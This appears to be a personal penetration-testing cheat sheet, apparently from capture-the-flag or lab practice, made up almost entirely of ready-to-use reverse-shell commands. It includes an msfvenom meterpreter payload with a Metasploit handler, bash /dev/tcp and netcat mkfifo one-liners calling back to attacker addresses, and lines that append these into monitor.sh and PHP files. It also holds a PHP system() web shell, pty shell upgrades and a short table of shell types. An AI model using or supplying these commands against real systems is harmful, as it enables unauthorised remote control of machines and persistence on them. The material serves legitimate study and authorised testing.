msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=5555 -f exe > shell.exe
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 5555
set ExitOnSession false
exploit -j
https://github.com/ivan-sincek/php-reverse-shell/blob/master/README.md
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
Start a listener
nc -lvnp 8443
Bash reverse shell
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
Upgrade shell
python -c 'import pty; pty.spawn("/bin/bash")'
https://highon.coffee/blog/reverse-shell-cheat-sheet/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT) >/tmp/f
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.200 8443 >/tmp/f’ | tee -a monitor.sh
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.200 8444 >/tmp/f’ | tee -a bob2.php
echo ‘<?php system (“sudo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.200 8888 >/tmp/f”); ?>’ | tee –a bob6.php
PHP reverse shell scripts
<?php system(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your machine’s IP> 1234 >/tmp/f”); ?>
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Upgrade Shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Shell Type | Description |
---|---|
Reverse shell | Initiates a connection back to a “listener” on our attack box. |
Bind shell | “Binds” to a specific port on the target host and waits for a connection from our attack box. |
Web shell | Runs operating system commands via the web browser, typically non-interactive or semi-interactive. It can also be used to run single commands (e.g., by leveraging a file upload vulnerability to upload a PHP script that runs a single command). |